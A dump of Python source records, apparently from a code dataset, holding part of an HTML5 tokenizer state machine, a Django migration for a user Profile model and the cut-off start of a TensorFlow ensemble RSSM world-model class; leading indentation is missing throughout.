self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': data})
return True
def scriptDataDoubleEscapedDashState(self):
data = self.stream.char()
if data == '-':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '-'})
self.state = self.scriptDataDoubleEscapedDashDashState
elif data == '<':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '<'})
self.state = self.scriptDataDoubleEscapedLessThanSignState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '\uFFFD'})
self.state = self.scriptDataDoubleEscapedState
elif data == EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-script-in-script'})
self.state = self.dataState
else:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': data})
self.state = self.scriptDataDoubleEscapedState
return True
def scriptDataDoubleEscapedDashDashState(self):
data = self.stream.char()
if data == '-':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '-'})
elif data == '<':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '<'})
self.state = self.scriptDataDoubleEscapedLessThanSignState
elif data == '>':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '>'})
self.state = self.scriptDataState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': '\uFFFD'})
self.state = self.scriptDataDoubleEscapedState
elif data == EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-script-in-script'})
self.state = self.dataState
else:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': data})
self.state = self.scriptDataDoubleEscapedState
return True
def scriptDataDoubleEscapedLessThanSignState(self):
data = self.stream.char()
if data == '/':
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': '/'})
self.temporaryBuffer = ''
self.state = self.scriptDataDoubleEscapeEndState
else:
self.stream.unget(data)
self.state = self.scriptDataDoubleEscapedState
return True
def scriptDataDoubleEscapeEndState(self):
data = self.stream.char()
if data in (spaceCharacters | frozenset(('/', '>'))):
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': data})
if self.temporaryBuffer.lower() == 'script':
self.state = self.scriptDataEscapedState
else:
self.state = self.scriptDataDoubleEscapedState
elif data in asciiLetters:
self.tokenQueue.append({'type': tokenTypes['Characters'], 'data': data})
self.temporaryBuffer += data
else:
self.stream.unget(data)
self.state = self.scriptDataDoubleEscapedState
return True
def beforeAttributeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.stream.charsUntil(spaceCharacters, True)
elif data in asciiLetters:
self.currentToken['data'].append([data, ''])
self.state = self.attributeNameState
elif data == '>':
self.emitCurrentToken()
elif data == '/':
self.state = self.selfClosingStartTagState
elif data in ("'", '"', '=', '<'):
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'invalid-character-in-attribute-name'})
self.currentToken['data'].append([data, ''])
self.state = self.attributeNameState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['data'].append(['\uFFFD', ''])
self.state = self.attributeNameState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-attribute-name-but-got-eof'})
self.state = self.dataState
else:
self.currentToken['data'].append([data, ''])
self.state = self.attributeNameState
return True
def attributeNameState(self):
data = self.stream.char()
leavingThisState = True
emitToken = False
if data == '=':
self.state = self.beforeAttributeValueState
elif data in asciiLetters:
self.currentToken['data'][-1][0] += data +\
self.stream.charsUntil(asciiLetters, True)
leavingThisState = False
elif data == '>':
# XXX If we emit here the attributes are converted to a dict
# without being checked and when the code below runs we error
# because data is a dict not a list
emitToken = True
elif data in spaceCharacters:
self.state = self.afterAttributeNameState
elif data == '/':
self.state = self.selfClosingStartTagState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['data'][-1][0] += '\uFFFD'
leavingThisState = False
elif data in ("'", '"', '<'):
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data':
'invalid-character-in-attribute-name'})
self.currentToken['data'][-1][0] += data
leavingThisState = False
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'eof-in-attribute-name'})
self.state = self.dataState
else:
self.currentToken['data'][-1][0] += data
leavingThisState = False
if leavingThisState:
# Attributes are not dropped at this stage. That happens when the
# start tag token is emitted so values can still be safely appended
# to attributes, but we do want to report the parse error in time.
if self.lowercaseAttrName:
self.currentToken['data'][-1][0] = (
self.currentToken['data'][-1][0].translate(asciiUpper2Lower))
for name, value in self.currentToken['data'][:-1]:
if self.currentToken['data'][-1][0] == name:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'duplicate-attribute'})
break
# XXX Fix for above XXX
if emitToken:
self.emitCurrentToken()
return True
def afterAttributeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.stream.charsUntil(spaceCharacters, True)
elif data == '=':
self.state = self.beforeAttributeValueState
elif data == '>':
self.emitCurrentToken()
elif data in asciiLetters:
self.currentToken['data'].append([data, ''])
self.state = self.attributeNameState
elif data == '/':
self.state = self.selfClosingStartTagState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['data'].append(['\uFFFD', ''])
self.state = self.attributeNameState
elif data in ("'", '"', '<'):
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'invalid-character-after-attribute-name'})
self.currentToken['data'].append([data, ''])
self.state = self.attributeNameState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-end-of-tag-but-got-eof'})
self.state = self.dataState
else:
self.currentToken['data'].append([data, ''])
self.state = self.attributeNameState
return True
def beforeAttributeValueState(self):
data = self.stream.char()
if data in spaceCharacters:
self.stream.charsUntil(spaceCharacters, True)
elif data == "\"":
self.state = self.attributeValueDoubleQuotedState
elif data == '&':
self.state = self.attributeValueUnQuotedState
self.stream.unget(data)
elif data == "'":
self.state = self.attributeValueSingleQuotedState
elif data == '>':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-attribute-value-but-got-right-bracket'})
self.emitCurrentToken()
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['data'][-1][1] += '\uFFFD'
self.state = self.attributeValueUnQuotedState
elif data in ('=', '<', '`'):
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'equals-in-unquoted-attribute-value'})
self.currentToken['data'][-1][1] += data
self.state = self.attributeValueUnQuotedState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-attribute-value-but-got-eof'})
self.state = self.dataState
else:
self.currentToken['data'][-1][1] += data
self.state = self.attributeValueUnQuotedState
return True
def attributeValueDoubleQuotedState(self):
data = self.stream.char()
if data == "\"":
self.state = self.afterAttributeValueState
elif data == '&':
self.processEntityInAttribute('"')
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['data'][-1][1] += '\uFFFD'
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-attribute-value-double-quote'})
self.state = self.dataState
else:
self.currentToken['data'][-1][1] += data +\
self.stream.charsUntil(("\"", '&', '\u0000'))
return True
def attributeValueSingleQuotedState(self):
data = self.stream.char()
if data == "'":
self.state = self.afterAttributeValueState
elif data == '&':
self.processEntityInAttribute("'")
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['data'][-1][1] += '\uFFFD'
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-attribute-value-single-quote'})
self.state = self.dataState
else:
self.currentToken['data'][-1][1] += data +\
self.stream.charsUntil(("'", '&', '\u0000'))
return True
def attributeValueUnQuotedState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeAttributeNameState
elif data == '&':
self.processEntityInAttribute('>')
elif data == '>':
self.emitCurrentToken()
elif data in ('"', "'", '=', '<', '`'):
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-character-in-unquoted-attribute-value'})
self.currentToken['data'][-1][1] += data
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['data'][-1][1] += '\uFFFD'
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-attribute-value-no-quotes'})
self.state = self.dataState
else:
self.currentToken['data'][-1][1] += data + self.stream.charsUntil(
frozenset(('&', '>', '"', "'", '=', '<', '`', '\u0000')) | spaceCharacters)
return True
def afterAttributeValueState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeAttributeNameState
elif data == '>':
self.emitCurrentToken()
elif data == '/':
self.state = self.selfClosingStartTagState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-EOF-after-attribute-value'})
self.stream.unget(data)
self.state = self.dataState
else:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-character-after-attribute-value'})
self.stream.unget(data)
self.state = self.beforeAttributeNameState
return True
def selfClosingStartTagState(self):
data = self.stream.char()
if data == '>':
self.currentToken['selfClosing'] = True
self.emitCurrentToken()
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data':
'unexpected-EOF-after-solidus-in-tag'})
self.stream.unget(data)
self.state = self.dataState
else:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-character-after-solidus-in-tag'})
self.stream.unget(data)
self.state = self.beforeAttributeNameState
return True
def bogusCommentState(self):
# Make a new comment token and give it as value all the characters
# until the first > or EOF (charsUntil checks for EOF automatically)
# and emit it.
data = self.stream.charsUntil('>')
data = data.replace('\u0000', '\uFFFD')
self.tokenQueue.append(
{'type': tokenTypes['Comment'], 'data': data})
# Eat the character directly after the bogus comment which is either a
# ">" or an EOF.
self.stream.char()
self.state = self.dataState
return True
def markupDeclarationOpenState(self):
charStack = [self.stream.char()]
if charStack[-1] == '-':
charStack.append(self.stream.char())
if charStack[-1] == '-':
self.currentToken = {'type': tokenTypes['Comment'], 'data': ''}
self.state = self.commentStartState
return True
elif charStack[-1] in ('d', 'D'):
matched = True
for expected in (('o', 'O'), ('c', 'C'), ('t', 'T'),
('y', 'Y'), ('p', 'P'), ('e', 'E')):
charStack.append(self.stream.char())
if charStack[-1] not in expected:
matched = False
break
if matched:
self.currentToken = {'type': tokenTypes['Doctype'],
'name': '',
'publicId': None, 'systemId': None,
'correct': True}
self.state = self.doctypeState
return True
elif (charStack[-1] == '[' and
self.parser is not None and
self.parser.tree.openElements and
self.parser.tree.openElements[-1].namespace != self.parser.tree.defaultNamespace):
matched = True
for expected in ['C', 'D', 'A', 'T', 'A', '[']:
charStack.append(self.stream.char())
if charStack[-1] != expected:
matched = False
break
if matched:
self.state = self.cdataSectionState
return True
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-dashes-or-doctype'})
while charStack:
self.stream.unget(charStack.pop())
self.state = self.bogusCommentState
return True
def commentStartState(self):
data = self.stream.char()
if data == '-':
self.state = self.commentStartDashState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['data'] += '\uFFFD'
elif data == '>':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'incorrect-comment'})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-comment'})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken['data'] += data
self.state = self.commentState
return True
def commentStartDashState(self):
data = self.stream.char()
if data == '-':
self.state = self.commentEndState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['data'] += '-\uFFFD'
elif data == '>':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'incorrect-comment'})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-comment'})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken['data'] += '-' + data
self.state = self.commentState
return True
def commentState(self):
data = self.stream.char()
if data == '-':
self.state = self.commentEndDashState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['data'] += '\uFFFD'
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'eof-in-comment'})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken['data'] += data + \
self.stream.charsUntil(('-', '\u0000'))
return True
def commentEndDashState(self):
data = self.stream.char()
if data == '-':
self.state = self.commentEndState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['data'] += '-\uFFFD'
self.state = self.commentState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-comment-end-dash'})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken['data'] += '-' + data
self.state = self.commentState
return True
def commentEndState(self):
data = self.stream.char()
if data == '>':
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['data'] += '--\uFFFD'
self.state = self.commentState
elif data == '!':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-bang-after-double-dash-in-comment'})
self.state = self.commentEndBangState
elif data == '-':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-dash-after-double-dash-in-comment'})
self.currentToken['data'] += data
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-comment-double-dash'})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
# XXX
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-char-in-comment'})
self.currentToken['data'] += '--' + data
self.state = self.commentState
return True
def commentEndBangState(self):
data = self.stream.char()
if data == '>':
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == '-':
self.currentToken['data'] += '--!'
self.state = self.commentEndDashState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['data'] += '--!\uFFFD'
self.state = self.commentState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-comment-end-bang-state'})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken['data'] += '--!' + data
self.state = self.commentState
return True
def doctypeState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeDoctypeNameState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-doctype-name-but-got-eof'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'need-space-after-doctype'})
self.stream.unget(data)
self.state = self.beforeDoctypeNameState
return True
def beforeDoctypeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == '>':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-doctype-name-but-got-right-bracket'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['name'] = '\uFFFD'
self.state = self.doctypeNameState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-doctype-name-but-got-eof'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken['name'] = data
self.state = self.doctypeNameState
return True
def doctypeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
self.currentToken['name'] = self.currentToken['name'].translate(asciiUpper2Lower)
self.state = self.afterDoctypeNameState
elif data == '>':
self.currentToken['name'] = self.currentToken['name'].translate(asciiUpper2Lower)
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['name'] += '\uFFFD'
self.state = self.doctypeNameState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-doctype-name'})
self.currentToken['correct'] = False
self.currentToken['name'] = self.currentToken['name'].translate(asciiUpper2Lower)
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken['name'] += data
return True
def afterDoctypeNameState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == '>':
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.currentToken['correct'] = False
self.stream.unget(data)
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-doctype'})
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
if data in ('p', 'P'):
matched = True
for expected in (('u', 'U'), ('b', 'B'), ('l', 'L'),
('i', 'I'), ('c', 'C')):
data = self.stream.char()
if data not in expected:
matched = False
break
if matched:
self.state = self.afterDoctypePublicKeywordState
return True
elif data in ('s', 'S'):
matched = True
for expected in (('y', 'Y'), ('s', 'S'), ('t', 'T'),
('e', 'E'), ('m', 'M')):
data = self.stream.char()
if data not in expected:
matched = False
break
if matched:
self.state = self.afterDoctypeSystemKeywordState
return True
# All the characters read before the current 'data' will be
# [a-zA-Z], so they're garbage in the bogus doctype and can be
# discarded; only the latest character might be '>' or EOF
# and needs to be ungetted
self.stream.unget(data)
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'expected-space-or-right-bracket-in-doctype', 'datavars':
{'data': data}})
self.currentToken['correct'] = False
self.state = self.bogusDoctypeState
return True
def afterDoctypePublicKeywordState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeDoctypePublicIdentifierState
elif data in ("'", '"'):
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-char-in-doctype'})
self.stream.unget(data)
self.state = self.beforeDoctypePublicIdentifierState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.stream.unget(data)
self.state = self.beforeDoctypePublicIdentifierState
return True
def beforeDoctypePublicIdentifierState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == "\"":
self.currentToken['publicId'] = ''
self.state = self.doctypePublicIdentifierDoubleQuotedState
elif data == "'":
self.currentToken['publicId'] = ''
self.state = self.doctypePublicIdentifierSingleQuotedState
elif data == '>':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-end-of-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-char-in-doctype'})
self.currentToken['correct'] = False
self.state = self.bogusDoctypeState
return True
def doctypePublicIdentifierDoubleQuotedState(self):
data = self.stream.char()
if data == "\"":
self.state = self.afterDoctypePublicIdentifierState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['publicId'] += '\uFFFD'
elif data == '>':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-end-of-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken['publicId'] += data
return True
def doctypePublicIdentifierSingleQuotedState(self):
data = self.stream.char()
if data == "'":
self.state = self.afterDoctypePublicIdentifierState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['publicId'] += '\uFFFD'
elif data == '>':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-end-of-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken['publicId'] += data
return True
def afterDoctypePublicIdentifierState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.betweenDoctypePublicAndSystemIdentifiersState
elif data == '>':
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == '"':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-char-in-doctype'})
self.currentToken['systemId'] = ''
self.state = self.doctypeSystemIdentifierDoubleQuotedState
elif data == "'":
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-char-in-doctype'})
self.currentToken['systemId'] = ''
self.state = self.doctypeSystemIdentifierSingleQuotedState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-char-in-doctype'})
self.currentToken['correct'] = False
self.state = self.bogusDoctypeState
return True
def betweenDoctypePublicAndSystemIdentifiersState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == '>':
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data == '"':
self.currentToken['systemId'] = ''
self.state = self.doctypeSystemIdentifierDoubleQuotedState
elif data == "'":
self.currentToken['systemId'] = ''
self.state = self.doctypeSystemIdentifierSingleQuotedState
        elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-char-in-doctype'})
self.currentToken['correct'] = False
self.state = self.bogusDoctypeState
return True
def afterDoctypeSystemKeywordState(self):
data = self.stream.char()
if data in spaceCharacters:
self.state = self.beforeDoctypeSystemIdentifierState
elif data in ("'", '"'):
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-char-in-doctype'})
self.stream.unget(data)
self.state = self.beforeDoctypeSystemIdentifierState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.stream.unget(data)
self.state = self.beforeDoctypeSystemIdentifierState
return True
def beforeDoctypeSystemIdentifierState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == "\"":
self.currentToken['systemId'] = ''
self.state = self.doctypeSystemIdentifierDoubleQuotedState
elif data == "'":
self.currentToken['systemId'] = ''
self.state = self.doctypeSystemIdentifierSingleQuotedState
elif data == '>':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-char-in-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-char-in-doctype'})
self.currentToken['correct'] = False
self.state = self.bogusDoctypeState
return True
def doctypeSystemIdentifierDoubleQuotedState(self):
data = self.stream.char()
if data == "\"":
self.state = self.afterDoctypeSystemIdentifierState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['systemId'] += '\uFFFD'
elif data == '>':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-end-of-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken['systemId'] += data
return True
def doctypeSystemIdentifierSingleQuotedState(self):
data = self.stream.char()
if data == "'":
self.state = self.afterDoctypeSystemIdentifierState
elif data == '\u0000':
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
self.currentToken['systemId'] += '\uFFFD'
elif data == '>':
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-end-of-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.currentToken['systemId'] += data
return True
def afterDoctypeSystemIdentifierState(self):
data = self.stream.char()
if data in spaceCharacters:
pass
elif data == '>':
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'eof-in-doctype'})
self.currentToken['correct'] = False
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
self.tokenQueue.append({'type': tokenTypes['ParseError'], 'data':
'unexpected-char-in-doctype'})
self.state = self.bogusDoctypeState
return True
def bogusDoctypeState(self):
data = self.stream.char()
if data == '>':
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
elif data is EOF:
# XXX EMIT
self.stream.unget(data)
self.tokenQueue.append(self.currentToken)
self.state = self.dataState
else:
pass
return True
def cdataSectionState(self):
data = []
while True:
data.append(self.stream.charsUntil(']'))
data.append(self.stream.charsUntil('>'))
char = self.stream.char()
if char == EOF:
break
else:
assert char == '>'
if data[-1][-2:] == ']]':
data[-1] = data[-1][:-2]
break
else:
data.append(char)
data = ''.join(data)
# Deal with null here rather than in the parser
nullCount = data.count('\u0000')
if nullCount > 0:
for i in range(nullCount):
self.tokenQueue.append({'type': tokenTypes['ParseError'],
'data': 'invalid-codepoint'})
data = data.replace('\u0000', '\uFFFD')
if data:
self.tokenQueue.append({'type': tokenTypes['Characters'],
'data': data})
self.state = self.dataState
return True
|
py | b414d1d29fce922af2c2cba6949ad8868d793f8e | # Generated by Django 3.0.8 on 2020-08-03 19:03
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
initial = True
dependencies = [
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
]
operations = [
migrations.CreateModel(
name='Profile',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('website', models.URLField(blank=True)),
('biography', models.TextField(blank=True)),
('phone_number', models.CharField(blank=True, max_length=20)),
('picture', models.ImageField(blank=True, null=True, upload_to='users/pictures')),
('created', models.DateTimeField(auto_now_add=True)),
('modified', models.DateTimeField(auto_now=True)),
('user', models.OneToOneField(on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
],
),
]
|
py | b414d1f0529b798e4d5b470feb7661651ce8d27d | import re
import numpy as np
import tensorflow as tf
from tensorflow.keras import layers as tfkl
from tensorflow_probability import distributions as tfd
from tensorflow.keras.mixed_precision import experimental as prec
import common
class EnsembleRSSM(common.Module):
def __init__(
self, ensemble=5, stoch=30, deter=200, hidden=200, discrete=False,
act='elu', norm='none', std_act='softplus', min_std=0.1):
super().__init__()
self._ensemble = ensemble
self._stoch = stoch
self._deter = deter
self._hidden = hidden
self._discrete = discrete
self._act = get_act(act)
self._norm = norm
self._std_act = std_act
self._min_std = min_std
self._cell = GRUCell(self._deter, norm=True)
self._cast = lambda x: tf.cast(x, prec.global_policy().compute_dtype)
def initial(self, batch_size):
dtype = prec.global_policy().compute_dtype
if self._discrete:
state = dict(
logit=tf.zeros([batch_size, self._stoch, self._discrete], dtype),
stoch=tf.zeros([batch_size, self._stoch, self._discrete], dtype),
deter=self._cell.get_initial_state(None, batch_size, dtype))
else:
state = dict(
mean=tf.zeros([batch_size, self._stoch], dtype),
std=tf.zeros([batch_size, self._stoch], dtype),
stoch=tf.zeros([batch_size, self._stoch], dtype),
deter=self._cell.get_initial_state(None, batch_size, dtype))
return state
@tf.function
def observe(self, embed, action, is_first, state=None):
swap = lambda x: tf.transpose(x, [1, 0] + list(range(2, len(x.shape))))
if state is None:
state = self.initial(tf.shape(action)[0])
post, prior = common.static_scan(
lambda prev, inputs: self.obs_step(prev[0], *inputs),
(swap(action), swap(embed), swap(is_first)), (state, state))
post = {k: swap(v) for k, v in post.items()}
prior = {k: swap(v) for k, v in prior.items()}
return post, prior
@tf.function
def imagine(self, action, state=None):
swap = lambda x: tf.transpose(x, [1, 0] + list(range(2, len(x.shape))))
if state is None:
state = self.initial(tf.shape(action)[0])
assert isinstance(state, dict), state
action = swap(action)
